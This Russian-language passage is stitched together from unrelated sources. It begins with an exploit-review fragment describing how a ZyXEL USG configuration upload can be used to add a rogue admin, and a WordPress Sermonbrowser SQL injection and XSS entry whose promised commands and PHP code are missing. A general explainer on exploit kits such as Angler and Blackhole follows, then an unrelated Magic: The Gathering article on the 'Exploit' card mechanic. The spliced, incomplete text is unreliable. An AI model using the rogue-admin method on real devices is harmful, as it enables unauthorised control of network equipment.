Ρ‚ΠΎΠΌΡƒ ΠΆΠ΅, Ссли Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅ΠΌΠΎΠΌΡƒ Ρ„Π°ΠΉΠ»Ρƒ Π½Π°Π·Π½Π°Ρ‡ΠΈΡ‚ΡŒ имя Β«startup-config. confΒ», Ρ‚ΠΎ настройки, ΡƒΠΊΠ°Π·Π°Π½Π½Ρ‹Π΅ Π² Π½Π΅ΠΌ, примСнятся Π½Π΅Π·Π°ΠΌΠ΅Π΄Π»ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ. Π’ Π½Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Π΄ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ Π²Ρ‚ΠΎΡ€ΠΎΠ³ΠΎ Π°Π΄ΠΌΠΈΠ½Π° с извСстным Π½Π°ΠΌ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΌ.

Π˜Ρ‚Π°ΠΊ, Π΄Π²Π΅ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠ΅ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ Π΄Π΅ΠΌΠΎΠ½ΡΡ‚Ρ€ΠΈΡ€ΡƒΡŽΡ‚, ΠΊΠ°ΠΊ ΠΌΠΎΠΆΠ½ΠΎ ΡΠΊΠ°Ρ‡Π°Ρ‚ΡŒ/ Π·Π°ΠΊΠ°Ρ‡Π°Ρ‚ΡŒ искомый ΠΊΠΎΠ½Ρ„ΠΈΠ³ ΠΈ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΏΠΎΠ»Π½Ρ‹ΠΉ доступ ΠΊ устройству:

Targets

ВсС ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΠΈ ZyXEL USG, Π²Ρ‹ΠΏΡƒΡ‰Π΅Π½Π½Ρ‹Π΅ Π΄ΠΎ 25 апрСля 2011 Π³ΠΎΠ΄Π°, ΡΠ²Π»ΡΡŽΡ‚ΡΡ уязвимыми.

Solution

Π‘ΠΊΠ°Ρ‡Π°ΠΉ ΠΈ установи ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½Π½ΡƒΡŽ ΠΏΡ€ΠΎΡˆΠΈΠ²ΠΊΡƒ, Π΄Π°Ρ‚ΠΈΡ€ΠΎΠ²Π°Π½Π½ΡƒΡŽ 25 апрСля, Π»ΠΈΠ±ΠΎ ΠΎΡ‚ΠΊΠ»ΡŽΡ‡ΠΈ административный Π²Π΅Π±-интСрфСйс.

SQL ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΡ ΠΈ XSS Π² WordPress Sermonbrowser Plugin

CVSSV2

Brief

Π’ ΠΊΠΎΠ½Ρ†Π΅ апрСля Π½Π΅ΠΊΠΈΠΉ Ma3sTr0-Dz ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π» ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΠΎΠΉ эксплоит ΠΏΠΎΠ΄ ΠΎΡ‡Π΅Ρ€Π΅Π΄Π½ΠΎΠΉ ΠΏΠ»Π°Π³ΠΈΠ½ для Π’ΠΎΡ€Π΄ΠŸΡ€Π΅ΡΡΠ°. Уязвимости достаточно Ρ‚Ρ€ΠΈΠ²ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ β€” это SQL ΠΈΠ½ΡŠΠ΅ΠΊΡ†ΠΈΡ ΠΈ мСТсайтовый скриптинг. Π’ Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ эксплуатации ΠΏΠ΅Ρ€Π²ΠΎΠΉ ΠΌΠΎΠΆΠ½ΠΎ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Ρ…Π΅Ρˆ Π°Π΄ΠΌΠΈΠ½Π°, Π² Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π΅ Π²Ρ‚ΠΎΡ€ΠΎΠΉ β€” ΠΊΡƒΠΊΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ (Π² Ρ‚ΠΎΠΌ числС ΠΈ Π°Π΄ΠΌΠΈΠ½Π°).

Exploit

Эксплоит написан Π½Π° php, ΠΏΡ€ΠΈ Π΅Π³ΠΎ запускС Π² качСствС ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π° Π½ΡƒΠΆΠ½ΠΎ всСго лишь ΡƒΠΊΠ°Π·Π°Ρ‚ΡŒ ссылку Π½Π° уязвимый сайт, дальшС скрипт всС сдСлаСт сам. Π’ΠΎΡ‚ Π΅Π³ΠΎ ΠΊΠΎΠ΄ (ΠΈΡΠΊΠ»ΡŽΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ для ознакомлСния):

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Эксплойт. Π’ΠΈΠ΄Ρ‹ эксплойтов.

БСгодняшняя ΡΡ‚Π°Ρ‚ΡŒΡ посвящСна эксплойтам ΠΈ ΠΈΡ… Π²ΠΈΠ΄Π°ΠΌ. Π’Π΅Π΄ΡŒ Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ ΡƒΠ½ΠΈΡ‡Ρ‚ΠΎΠΆΠΈΡ‚ΡŒ Π²Ρ€Π°Π³Π° Π΅Π³ΠΎ Π½Π°Π΄ΠΎ Π·Π½Π°Ρ‚ΡŒ Π² Π»ΠΈΡ†ΠΎ.

Эксплойты β€” это ΠΏΠΎΠ΄Π²ΠΈΠ΄ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ. Они содСрТат Π΄Π°Π½Π½Ρ‹Π΅ ΠΈΠ»ΠΈ исполняСмый ΠΊΠΎΠ΄, способный Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ»ΠΈ нСсколькими уязвимостями Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ обСспСчСнии Π½Π° локальном ΠΈΠ»ΠΈ ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΌ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π΅.

НапримСр, Ρƒ вас Π΅ΡΡ‚ΡŒ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€, ΠΈ Π΅ΡΡ‚ΡŒ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π½Π΅ΠΌ, которая позволяСт ΠΈΡΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ Β«ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄Β», Ρ‚ΠΎ Π΅ΡΡ‚ΡŒ ΡƒΡΡ‚Π°Π½ΠΎΠ²ΠΈΡ‚ΡŒ ΠΈ Π·Π°ΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ Π½Π΅ΠΊΡƒΡŽ Π²Ρ€Π΅Π΄ΠΎΠ½ΠΎΡΠ½ΡƒΡŽ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡƒ Π½Π° вашСй систСмС Π±Π΅Π· вашСго Π²Π΅Π΄ΠΎΠΌΠ° ΠΈΠ»ΠΈ ΡΠΏΡ€ΠΎΠ²ΠΎΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΊΠ°ΠΊΠΎΠ΅-Π»ΠΈΠ±ΠΎ ΠΈΠ½ΠΎΠ΅ Π½Π΅ ΠΎΠΆΠΈΠ΄Π°Π΅ΠΌΠΎΠ΅ Π²Π°ΠΌΠΈ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ систСмы.

Эксплойт ΠΌΠΎΠΆΠ΅Ρ‚ Ρ€Π°ΡΠΏΡ€ΠΎΡΡ‚Ρ€Π°Π½ΡΡ‚ΡŒΡΡ Π² Π²ΠΈΠ΄Π΅ исходных тСкстов, исполняСмых ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ ΠΈΠ»ΠΈ словСсного описания использования уязвимости. Он ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ написан Π½Π° любом языкС программирования (Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ часто ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‰ΠΈΠ΅ΡΡ: C/C++, Perl, Python, PHP, HTML+JavaScript).

Как происходит Π·Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅

БущСствуСт Π΄Π²Π° способа заразится эксплойтом. Π’ΠΎ-ΠΏΠ΅Ρ€Π²Ρ‹Ρ…, ΠΏΡ€ΠΈ посСщСнии сайта, содСрТащСго врСдоносный ΠΊΠΎΠ΄ эксплойта. Π’ΠΎ-Π²Ρ‚ΠΎΡ€Ρ‹Ρ…, ΠΏΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΌ Π±Π΅Π·ΠΎΠ±ΠΈΠ΄Π½ΠΎΠ³ΠΎ Π½Π° Π²ΠΈΠ΄ Ρ„Π°ΠΉΠ»Π° со скрытым врСдоносным ΠΊΠΎΠ΄ΠΎΠΌ. Для доставки Ρ‚Π°ΠΊΠΈΡ… Ρ„Π°ΠΉΠ»ΠΎΠ², ΠΊΠ°ΠΊ ΠΏΡ€Π°Π²ΠΈΠ»ΠΎ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ спам ΠΈΠ»ΠΈ Ρ„ΠΈΡˆΠΈΠ½Π³ΠΎΠ²Ρ‹Π΅ письма.

ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΎΠ½ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ доступ посрСдством уязвимости, эксплойт Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ с сСрвСра прСступников, ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²Π»ΡΡŽΡ‰ΠΈΠ΅ ΠΏΠΎΠ΄Ρ€Ρ‹Π²Π½ΡƒΡŽ Π΄Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ, Ρ‚Π°ΠΊΡƒΡŽ ΠΊΠ°ΠΊ ΠΊΡ€Π°ΠΆΠ° Π»ΠΈΡ‡Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…, использованиС ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π° Π² качСствС элСмСнта Π±ΠΎΡ‚Π½Π΅Ρ‚Π° для рассылки спама ΠΈΠ»ΠΈ выполнСния DDoS-Π°Ρ‚Π°ΠΊ.

Π’ΠΈΠ΄Ρ‹ эксплойтов

ΠŸΡ€ΠΈΠΌΠ΅Ρ€Ρ‹ Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ извСстных Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов:

Angler β€” ΠΎΠ΄ΠΈΠ½ ΠΈΠ· самых слоТных Π½Π°Π±ΠΎΡ€ΠΎΠ² Π½Π° Ρ‡Π΅Ρ€Π½ΠΎΠΌ Ρ€Ρ‹Π½ΠΊΠ΅. Π­Ρ‚ΠΎΡ‚ Π½Π°Π±ΠΎΡ€ эксплойтов своим появлСниСм ΠΈΠ·ΠΌΠ΅Π½ΠΈΠ» ΠΏΡ€Π°Π²ΠΈΠ»Π° ΠΈΠ³Ρ€Ρ‹, послС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π½Π°Ρ‡Π°Π» ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ антивирусы ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ (часто ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹Π΅ экспСртами ΠΏΠΎ бСзопасности ΠΊΠ°ΠΊ ΠΏΡ€ΠΈΠΌΠ°Π½ΠΊΠΈ) ΠΈ Π·Π°Π΄Π΅ΠΉΡΡ‚Π²ΠΎΠ²Π°Ρ‚ΡŒ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ для затруднСния исслСдования. Π­Ρ‚ΠΎ ΠΎΠ΄ΠΈΠ½ ΠΈΠ· Ρ‚Π΅Ρ… Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ быстрСС всСго Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ Π² свой арсСнал Π½Π΅Π΄Π°Π²Π½ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ уязвимости Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня, Π° Π΅Π³ΠΎ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Π² памяти, Π±Π΅Π· записи Π½Π° ТСстких дисках ΠΆΠ΅Ρ€Ρ‚Π².

Blackhole Kit β€” Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ распространСнная Π²Π΅Π±-ΡƒΠ³Ρ€ΠΎΠ·Π° Π² 2012 Π³ΠΎΠ΄Ρƒ, нацСлСнная Π½Π° уязвимости Π² старых вСрсиях Π±Ρ€Π°ΡƒΠ·Π΅Ρ€ΠΎΠ² Firefox, Chrome, Internet Explorer ΠΈ Safari, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΠ½ΠΎΠ³ΠΈΡ… популярных ΠΏΠ»Π°Π³ΠΈΠ½ΠΎΠ², Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ Adobe Flash, Adobe Acrobat ΠΈ Java. ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ Π·Π°ΠΌΠ°Π½ΠΈΠ»ΠΈ ΠΈΠ»ΠΈ ΠΏΠ΅Ρ€Π΅Π½Π°ΠΏΡ€Π°Π²ΠΈΠ»ΠΈ Π½Π° страницу подсадки, Π·Π°ΠΏΡƒΡ‚Π°Π½Π½Ρ‹ΠΉ JavaScript опрСдСляСт содСрТимоС ΠΌΠ°ΡˆΠΈΠ½Ρ‹ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Ρ‚Π΅ эксплойты, для ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹ΠΉ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ уязвим.

Для Π·Π°Ρ‰ΠΈΡ‚Ρ‹ ΠΎΡ‚ эксплойтов сущСствуСт мноТСство ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΠΎΠΌΠΎΠ³ΡƒΡ‚ Π’Π°ΠΌ Π·Π°Ρ‰ΠΈΡ‚ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€. Π’Π°ΠΊΠΆΠ΅ рСкомСндуСтся Π½Π΅ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Ρ‚ΡŒ Π½Π΅Π·Π½Π°ΠΊΠΎΠΌΡ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹, письма ΠΈ Π·Π°Ρ…ΠΎΠ΄ΠΈΡ‚ΡŒ Π½Π° Π½Π΅Π·Π½Π°ΠΊΠΎΠΌΡ‹Π΅ сайты.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Magic The Gathering: Ρ‡Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойт?

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты Π² ΠΈΠ³Ρ€Π°Ρ…

Π Π°Π΄ΠΈ Π²Ρ‹Π³ΠΎΠ΄Ρ‹ ΡƒΠ±ΠΈΠ²Π°ΠΉΡ‚Π΅ собствСнных сущСств с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· самых ТСстоких ΠΌΠ΅Ρ…Π°Π½ΠΈΠΊ Magic the Gathering.

Overcharged Amalgam ΠΎΡ‚ Майка Π”ΠΆΠΎΡ€Π΄Π°Π½Ρ‹

Π’ ΠΏΠ»Π°Π½Π΅ Magic the Gathering Π² Π˜Π½Π½ΠΈΡΡ‚Ρ€Π°Π΄Π΅ Π·ΠΎΠΌΠ±ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΡƒΠΆΠ°ΡΠ°ΡŽΡ‰ΠΈΠΌΠΈ, Π±Π΅Π·Π΄ΡƒΠΌΠ½Ρ‹ΠΌΠΈ поТиратСлями ΠΏΠ»ΠΎΡ‚ΠΈ, Π½ΠΎ Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ΄ΡƒΠΌΠ°Π»ΠΈ, ΠΊΠ°ΠΊ Π·Π°ΡΡ‚Π°Π²ΠΈΡ‚ΡŒ ΠΈΡ… Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ. Π˜Ρ… использовали ΠΊΠ°ΠΊ быстрыС ΠΈ Π»Π΅Π³ΠΊΠΈΠ΅ Π°Ρ€ΠΌΠΈΠΈ для отраТСния Π½Π°ΠΏΠ»Ρ‹Π²Π° Π΄Π΅ΠΌΠΎΠ½ΠΎΠ², ΠΎΠ½ΠΈ использовались Π² Π²ΠΎΠ΅Π½Π½Ρ‹Ρ… ΠΈΠ³Ρ€Π°Ρ… Π΄Π²ΡƒΡ… Π±Ρ€Π°Ρ‚ΡŒΠ΅Π² ΠΈ сСстСр с ΠΎΡ‡Π΅Π½ΡŒ Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ ΠΏΠΎΠ΄Ρ…ΠΎΠ΄Π°ΠΌΠΈ ΠΊ Π½Π΅ΠΆΠΈΡ‚ΠΈ, ΠΈ ΠΎΠ½ΠΈ Π΄Π°ΠΆΠ΅ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ ΠΊΠ°ΠΊ сСрвСры Π½Π° большой свадьбС Π²Π°ΠΌΠΏΠΈΡ€Π° Оливии Π’ΠΎΠ»Π΄Π°Ρ€Π΅Π½.

Π—ΠΎΠΌΠ±ΠΈ Π»Π΅Π³ΠΊΠΎ ΡΠΎΠ·Π΄Π°Π²Π°Ρ‚ΡŒ, ΠΈΠΌΠΈ Π»Π΅Π³ΠΊΠΎ ΠΌΠ°Π½ΠΈΠΏΡƒΠ»ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ, ΠΈ ΠΎΠ½ΠΈ ΠΎΡ‡Π΅Π½ΡŒ ΡƒΠ΄ΠΎΠ±Π½Ρ‹ Π² ΠΎΠ±Ρ€Π°Ρ‰Π΅Π½ΠΈΠΈ, ΠΊΠΎΠ³Π΄Π° появляСтся Π»ΡƒΡ‡ΡˆΠ°Ρ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ, ΠΈ это ΠΎΡ‚Ρ€Π°ΠΆΠ΅Π½ΠΎ Π² Π±ΠΎΠ»Π΅Π΅ старой ΠΌΠ΅Ρ…Π°Π½ΠΈΠΊΠ΅, Π²ΠΎΠ·Π²Ρ€Π°Ρ‰Π°ΡŽΡ‰Π΅ΠΉΡΡ Π² Innistrad: Crimson Vow ndash; Π­ΠΊΡΠΏΠ»ΡƒΠ°Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ. Π’ΠΎΡ‚ всС, Ρ‡Ρ‚ΠΎ Π²Π°ΠΌ Π½ΡƒΠΆΠ½ΠΎ Π·Π½Π°Ρ‚ΡŒ ΠΎΠ± Exploit.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойт?

Билумгарский мясник Дэйва КСндалла

Π’ΠΏΠ΅Ρ€Π²Ρ‹Π΅ появившаяся Π² Β«Π”Ρ€Π°ΠΊΠΎΠ½Π°Ρ… Π’Π°Ρ€ΠΊΠΈΡ€Π°Β», Exploit β€” это ΡΡ€Π°Π±Π°Ρ‚Ρ‹Π²Π°ΡŽΡ‰Π°Ρ ΡΠΏΠΎΡΠΎΠ±Π½ΠΎΡΡ‚ΡŒ, которая срабатываСт, ΠΊΠΎΠ³Π΄Π° сущСство с Π½Π΅ΠΉ Π²Ρ‹Ρ…ΠΎΠ΄ΠΈΡ‚ Π½Π° ΠΏΠΎΠ»Π΅ Π±ΠΈΡ‚Π²Ρ‹. ВмСсто Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π΄Π΅Π»Π°Ρ‚ΡŒ Ρ‡Ρ‚ΠΎ-Π»ΠΈΠ±ΠΎ само ΠΏΠΎ сСбС, Exploit просто ставит вопрос ΠΎ Ρ‚ΠΎΠΌ, Ρ…ΠΎΡ‚ΠΈΡ‚Π΅ Π»ΠΈ Π²Ρ‹ принСсти Π² ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ Π΄Ρ€ΡƒΠ³ΠΎΠ΅ сущСство.

Π₯отя это ΠΈ Π½Π΅ являСтся ΠΎΠ±ΡΠ·Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΌ, принСсСниС Π² ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ сущСства («Эксплуатация») даст Π²Π°ΠΌ ΠΌΠ½ΠΎΠ³ΠΎ прСимущСств ΠΏΠΎ ΡΡ€Π°Π²Π½Π΅Π½ΠΈΡŽ с исходным сущСством «Эксплуатация». НапримСр, ΠΊΠΎΠ³Π΄Π° Mindleech Ghoul эксплуатируСтся, ΠΎΠ½ Π²Ρ‹Π½ΡƒΠΆΠ΄Π°Π΅Ρ‚ ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ ΠΎΠΏΠΏΠΎΠ½Π΅Π½Ρ‚Π° ΠΈΠ·Π³Π½Π°Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚Ρƒ ΠΈΠ· своСй Ρ€ΡƒΠΊΠΈ, Π² Ρ‚ΠΎ врСмя ΠΊΠ°ΠΊ Silumgar Avenger ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ ускорСниС Π΄ΠΎ ΠΊΠΎΠ½Ρ†Π° Ρ…ΠΎΠ΄Π°.

Эксплойт β€” это Π½Π΅ ΠΏΠΎΠ²Ρ‚ΠΎΡ€ΡΡŽΡ‰ΠΈΠΉΡΡ эффСкт. Он срабатываСт Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Ρ‚ΠΎΠ³Π΄Π°, ΠΊΠΎΠ³Π΄Π° сущСство Exploit Π²Ρ‹Ρ…ΠΎΠ΄ΠΈΡ‚ Π½Π° ΠΏΠΎΠ»Π΅ Π±ΠΈΡ‚Π²Ρ‹, ΠΈ Π²Ρ‹ ΠΌΠΎΠΆΠ΅Ρ‚Π΅ ΠΏΠΎΠΆΠ΅Ρ€Ρ‚Π²ΠΎΠ²Π°Ρ‚ΡŒ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΎΠ΄Π½ΠΎ сущСство, Ρ‡Ρ‚ΠΎΠ±Ρ‹ эффСкт сработал ΠΎΠ΄ΠΈΠ½ Ρ€Π°Π·.

Как ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ эксплойт

Эксплуатация Π»ΡƒΡ‡ΡˆΠ΅ всСго Ρ€Π°Π±ΠΎΡ‚Π°Π΅Ρ‚, ΠΊΠΎΠ³Π΄Π° Ρƒ вас Π΅ΡΡ‚ΡŒ ΠΌΠ½ΠΎΠ³ΠΎ ΠΎΠ΄Π½ΠΎΡ€Π°Π·ΠΎΠ²Ρ‹Ρ… сущСств, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌΠΈ Π½ΡƒΠΆΠ½ΠΎ ΠΏΠΎΠΆΠ΅Ρ€Ρ‚Π²ΠΎΠ²Π°Ρ‚ΡŒ. Для этого ΠΎΡ‚Π»ΠΈΡ‡Π½ΠΎ подходят ΠΆΠ΅Ρ‚ΠΎΠ½Ρ‹ (особСнно Π Π°Π·Π»Π°Π³Π°ΡŽΡ‰ΠΈΠ΅ΡΡ Π·ΠΎΠΌΠ±ΠΈ ΠΈΠ· Innistrad: Midnight Hunt, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π±ΡƒΠ΄ΡƒΡ‚ принСсСны Π² ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ Π² любом случаС ), Π½ΠΎ Ρ‚Π°ΠΊΠΆΠ΅ ΠΈ Π»ΡŽΠ±Ρ‹Π΅ сущСства, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Π²Ρ‹ счастливы ΡƒΠ²ΠΈΠ΄Π΅Ρ‚ΡŒ, ΡƒΠΌΠΈΡ€Π°ΡŽΡ‚ ΠΈΠ»ΠΈ ΠΌΠΎΠ³ΡƒΡ‚ Π²Π΅Ρ€Π½ΡƒΡ‚ΡŒΡΡ. Π― Π½Π΅ ΠΈΠ³Ρ€Π°ΡŽ. ΠΊΠ°ΠΊ-Ρ‚ΠΎ.

ΠŸΡ€ΠΈΡΡ‚Π½ΠΎ Π²ΠΈΠ΄Π΅Ρ‚ΡŒ Β«Π­ΠΊΡΠΏΠ»ΡƒΠ°Ρ‚Π°Ρ†ΠΈΡŽΒ» Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΊΠ°ΠΊ эффСкт, Π½ΠΎ ΠΈ ΠΊΠ°ΠΊ способ принСсти сущСство Π² ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ. Π•ΡΡ‚ΡŒ ΠΌΠ½ΠΎΠ³ΠΎ ΠΊΠ°Ρ€Ρ‚, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ нравится, ΠΊΠΎΠ³Π΄Π° ΠΎΠ΄Π½ΠΎ ΠΈΠ· Π²Π°ΡˆΠΈΡ… сущСств ΡƒΠΌΠΈΡ€Π°Π΅Ρ‚, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, The Meathook Massacre, ΠΈ использованиС Exploit β€” Ρ…ΠΎΡ€ΠΎΡˆΠΈΠΉ способ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ эти Ρ‚Ρ€ΠΈΠ³Π³Π΅Ρ€Ρ‹ смСрти, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ прСимущСство Exploit Π² качСствС бонуса.

